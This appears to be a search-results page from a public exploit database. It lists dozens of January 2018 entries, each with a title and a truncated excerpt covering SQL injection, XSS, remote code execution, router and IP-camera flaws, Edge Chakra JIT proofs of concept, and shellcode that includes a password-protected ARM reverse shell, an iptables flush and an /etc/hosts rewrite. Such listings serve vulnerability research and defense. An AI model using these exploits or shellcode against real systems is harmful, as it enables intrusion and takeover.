47904 matches found
Flexible Poll 1.2 - SQL Injection
Exploit Title: Flexible Poll 1.2 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://ddywpro.com/ Software Link: https://codecanyon.net/item/flexible-poll/4363114 Version: 1.2 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5988 Exploit Author: Ihsan Sencan Author...
Quickad 4.0 - SQL Injection
Exploit Title: Classified Ads CMS - Quickad 4.0 - SQL Injection Dork: N/A Date: 23.01.2018 Vendor Homepage: http://bylancer.com/ Software Link: https://codecanyon.net/item/quickad-classified-ads-php-script/19960675 Version: 4.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: CVE-2018-5972...
Blizzard Update Agent - JSON RPC DNS Rebinding
All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed. The agent utility creates an JSON RPC server listening on localhost port 1120, and...
Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD
!/usr/bin/env python2.7 Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd. Verified 1 Fullhan IPC FH8830F22W7.1.42.1 2 Fullhan FH8830AR0330FISHEYEW7.1.37.5...
AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution
Unauthenticated LAN remote code execution in AsusWRT Discovered by Pedro Ribeiro [email protected], Agile Information Security ================================================================================= Disclosure: 22/01/2018 / Last updated: 25/01/2018 Background and summary AsusWRT is the...
OTRS 5.0.x/6.0.x - Remote Command Execution (1)
Exploit Title: OTRS 5.0.x/6.0.x - Remote Command Execution 1 Date: 21-01-2018 Exploit Author: Bæln0rn Vendor Homepage: https://www.otrs.com/ Software Link: http://ftp.otrs.org/pub/otrs/ Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 Tested on: OTRS 5.0.2/CentOS 7.2.1511 CVE : CVE-2017-169...
PHPFreeChat 1.7 - Denial of Service
Exploit Title: phpFreeChat 1.7 and earlier - Denial of Service Version: 1.7 and earlier Date: 21/01/2018 Vendor Homepage: http://www.phpfreechat.net Software Link: http://www.phpfreechat.net/download Exploit Author: A. Pakbaz CVE : CVE-2018-5954 1 $pid=pcntlfork; if$pid0 echo "\nError! Reduce the...
Shopware 5.2.5/5.3 - Cross-Site Scripting
Document Title: =============== Shopware 5.2.5 & v5.3 - Multiple Cross Site Scripting Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1922 Shopware Security Tracking ID: SW-19834 Security Update:...
Oracle JDeveloper 11.1.x/12.x - Directory Traversal
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt + ISR: apparition security Vendor: ============= www.oracle.com Product: =========== JDeveloper IDE Oracle JDeveloper is a free...
CentOS Web Panel 0.9.8.12 - Multiple Vulnerabilities
Document Title: =============== CentOS Web Panel v0.9.8.12 - Multiple Persistent Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1836 Release Date: ============= 2018-01-19 Vulnerability Laboratory ID VL-ID:...
macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'
/ AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure input buffer which it uses to index a small array of pointers to memory to copy back to userspace. There is no bounds checking on the attacker supplied value allowing with so...
Primefaces 5.x - Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module exploits an expression language remote code execution...
GitStack 2.3.10 - Remote Code Execution
Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution Date: 18.01.2018 Software Link: https://gitstack.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $SERVER'PHPAUTHPW' is directly passed t...
Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service
!/usr/bin/python3 """PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. """ import datetime import socket def main: """Use a default valid DHCP packet to overwrite an...
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
/ Let's start with comments in the "GlobOpt::TrackIntSpecializedAddSubConstant" method. // Track bounds for add or sub with a constant. For instance, consider b = a + 2. The value of 'b' should track // that it is equal to the value of 'a' + 2. That part has been done above. Similarly, the value ...
Master IP CAM 01 - Multiple Vulnerabilities
Exploit Title: Master IP CAM 01 Multiple Vulnerabilities Date: 17-01-2018 Remote: Yes Exploit Authors: Daniele Linguaglossa, Raffaele Sabato Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 Vendor: Master IP CAM Version: 3.3.4.2103 CVE: CVE-2018-5723, CVE-2018-5724,...
Belkin N600DB Wireless Router - Multiple Vulnerabilities
Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities Date: 16/01/2018 Exploit Author: Wadeek Hardware Version: F9K1102as v3 Firmware Version: 3.04.11 Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as Firmware Link:...
Reservo Image Hosting Script 1.5 - Cross-Site Scripting
Exploit Title: Reservo Image Hosting Script 1.5 - Cross Site Scripting Date: 15-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: reservo.co Version: 1.6 CVE-ID: CVE-2018-5705 With support for automatic thumbnails & image resizing in over 200...
Zomato Clone Script - Arbitrary File Upload
Zomato Clone - Arbitrary File Upload Date: 16.01.2018 Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script Demo: http://jhinstitute.com/demo/foodpanda/ Version: N/A Category: Webapps Tested on: Windows 10...
SugarCRM 3.5.1 - Cross-Site Scripting
Exploit Title: sugarCRM 3.5.1 XSS refeclted Date: 16/01/2017 Exploit Author: Guilherme Assmann Vendor Homepage: https://www.sugarcrm.com/ Version: 3.5.1 Tested on: kali linux, windows 7, 8.1, 10, ubuntu - Firefox Download...
D-Link DSL-2640R - DNS Change
D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability Firmware Version: UK1.06 Hardware Version: B1 Copyright 2018 c Todor Donev https://ethical-hacker.org/ https://facebook.com/ethicalhackerorg/ Description: The vulnerability exist in the web interface. D-Link's various routers are...
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
/ AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arridx & ...". In these cases, the index register remains NoRegister which is...
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
/ If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not exist in the stack. In these cases, the...
Microsoft Edge Chakra JIT - Out-of-Bounds Write
// Here's the PoC demonstrating OOB write. function optarr, start, end for let i = start; i end; i++ if i === 10 i += 0; // -- a arri = 2.3023e-320; function main let arr = new Array100; arr.fill1.1; for let i = 0; i 1000; i++ optarr, 0, 3; optarr, 0, 100000; main; / What happens here is as...
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
/ Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to issue 1310 . PoC: / // Enable the flag using '\n'.repeat0x1000 evalfunction f with function printf; ; ; + '\n'.repeat0x1000; PoC 2: // ./ch poc.js -ForceDeferParse...
Microsoft Edge Chakra - Incorrect Scope Handling
// PoC: function funcarg = function printfunc; // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. printfunc; function func ; // Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode...
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion
/ Here's a snippet of the method. bool JavascriptGeneratorFunction::GetPropertyBuiltInsVar originalInstance, PropertyId propertyId, Var value, PropertyValueInfo info, ScriptContext requestContext, BOOL result if propertyId == PropertyIds::length ... int len = 0; Var varLength; if...
glibc < 2.26 - 'getcwd()' Local Privilege Escalation
/ This software is provided by the copyright owner "as is" and any expressed or implied warranties, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall the copyright owner be liable for any direct, indirec...
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
Linux/ARM - Reverse TCP 192.168.1.1:4444/TCP Shell /bin/sh + Password MyPasswd + Null-Free Shellcode 156 bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - Password Protected Reverse Shell TCP /bin/sh. Null free shellcode 156 bytes Date: 2018-01-15 Tested: armv7l Raspberry Pi v3 Autho...
GitStack - Remote Code Execution
Vulnerability Summary The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack and then used to trigger an unauthenticated remote code execution. GitStack is “a software that lets you setup your own private Git server for Windows. This mea...
D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities
D-Link DNS-325 ShareCenter Multiple Vulnerabilities Vendor: D-Link Product: D-Link DNS-325 ShareCenter Version: = 1.05B03 Website: http://sharecenter.dlink.com/products/DNS-325 / / / / / / / / / / / / / / / / / / / / / \ / // / // / / / / / / / // / / / /,/// // /// // GulfTech Research and...
DarkComet (C2 Server) - File Upload
!/usr/bin/env python3 EDB Note: Source https://gist.github.com/PseudoLaboratories/260b6f24844785aacc1e2fb61dd05c01/259944bd94a0d289ef80b9138c1e3f97a97aa9cd from time import sleep from socket import socket, AFINET, SOCKSTREAM, error from re import search from Crypto.Cipher import ARC4 from binasci...
D-Link DNS-343 ShareCenter < 1.05 - Command Injection
D-Link DNS-343 ShareCenter Remote Root Vendor: D-Link Product: D-Link DNS-343 ShareCenter Version: = 1.05 Website: http://sharecenter.dlink.com/products/DNS-343 / / / / / / / / / / / / / / / / / / / / / \ / // / // / / / / / / / // / / / /,/// // /// // GulfTech Research and Development D-Link...
Oracle PeopleSoft 8.5x - Remote Code Execution
Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56 Date: 30 Oct 2017 Exploit Author: Vahagn Vardanyan Vendor Homepage: Oracle Software Link: Oracle PeopleSoft Version: 8.54, 8.55, 8.56 Tested on: Windows, Linux CVE : CVE-2017-10366...
RISE 1.9 - 'search' SQL Injection
Exploit Title: RISE Ultimate Project Manager 1.9 - SQL Injection Exploit Author: Ahmad Mahfouz Contact: http://twitter.com/eln1x Date: 30/12/2017 CVE: CVE-2017-17999 Vendor Homepage: http://fairsketch.com/ Version: 1.9 POST /index.php/knowledgebase/getarticlesuggestion/ HTTP/1.1 Host: localhost...
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
Exploit Title: Oracle E-Business suite Open Redirect Google Dork: inurl:OAHTML/cabo/ Date: April 2017 Exploit Author: author Vendor Homepage: http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html Software Link: download link if available Version: Oracle E-Business Suite...
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution
!/usr/local/bin/python """ Synology Photo Station = 6.8.2-3461 latest SYNOPHOTOFlickrMultiUpload Race Condition File Write Remote Code Execution Vulnerability Found by: mrme Tested: 6.8.2-3461 latest at the time Vendor Advisory: https://www.synology.com/en-global/support/security/SynologySA1802...
ILIAS < 5.2.4 - Cross-Site Scripting
Exploit Title: Cross Site Scripting in ILIAS CMS 5.2.3 Date: Apr 24, 2017 Software Link: https://www.ilias.de Exploit Author: Florian Kunushevci Contact: https://facebook.com/florianx00 CVE: CVE-2018-5688 Category: webapps 1. Description ILIAS before 5.2.4 has XSS via the cmd parameter to the...
PerfexCRM 1.9.7 - Arbitrary File Upload
Exploit Title: PerfexCRM 1.9.7 – Unrestricted php5 File upload Exploit Author: Ahmad Mahfouz Description: PerfexCRM 1.9.7 prone to unrestricted file upload that lead to system take over by misconfigured elfinder plugin Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2017-17976 Version...
Disk Pulse Enterprise 10.1.18 - Remote Buffer Overflow
Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow Exploit Author: Ahmad Mahfouz Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2017-15663 Version: v10.1.18 Tested on: Windows 7 x6...
SysGauge Server 3.6.18 - Remote Buffer Overflow
Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow Exploit Author: Ahmad Mahfouz Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH Contact: http://twitter.com/eln1x Date: 12/01/2018 CVE: CVE-2018-5359 Version: 3.6.18 Tested on: Windows 7 x64 Software Link:...
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
!/usr/bin/env python3 Exploit Title: pfSense = 2.1.3 statusrrdgraphimg.php Command Injection. Date: 2018-01-12 Exploit Author: absolomb Vendor Homepage: https://www.pfsense.org/ Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/ Version: =2.1.3 Tested on: FreeBSD 8.3-RELEASE-p16 CV...
ImgHosting 1.5 - Cross-Site Scripting
Exploit Title: ImgHosting Image Storage System 1.5 - Cross-Site-Scripting Date: 12-01-2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: foxsash.com Version: 1.5 CVE-ID: CVE-2018-5479 ImgHosting – Image Storage System quick and easy image hosting...
Domains & Hostings Manager PRO 3.0 - Authentication Bypass
Exploit Title: Domains & Hostings Manager PRO v 3.0 - Authentication Bypass Date: 13.01.2018 Vendor Homepage: http://endavi.com/ Software Buy: https://codecanyon.net/item/advanced-domains-and-hostings-pro-v3-multiuser/10368735 Demo: http://endavi.com/dhrprodemo/ Version: 3.0 Tested on: Windows 10...
Flash Operator Panel 2.31.03 - Command Execution
Document Title: =============== Flash Operator Panel v2.31.03 - Command Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1907 Release Date: ============= 2018-01-08 Vulnerability Laboratory ID VL-ID:...
OBS Studio 20.1.3 - Local Buffer Overflow
author = ''' Created: ScrR1pTK1dd13 Name: Greg Priest Mail: [email protected] Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day SEH Based PoC Date: 2018.01.15 Exploit Author: Greg Priest Version: OBS-Studio-20.1.3 Tested on: Windows7 x64 HUN/ENG Enterprise Software...
Adminer 4.3.1 - Server-Side Request Forgery
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: apparition security Vendor: ============== www.adminer.org Product: ================ Adminer = v4.3.1 Adminer...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
Linux/x86 - execve/bin/sh + Polymorphic Shellcode 26 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...
Linux/x86-64 - Flush IPTables Rules (execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)) Shellcode (43 bytes)
Linux/x86-64 - Flush IPTables Rules execve"/sbin/iptables", "/sbin/iptables", "-F", NULL Shellcode 43 bytes. Shellcode ... / section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 96 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push...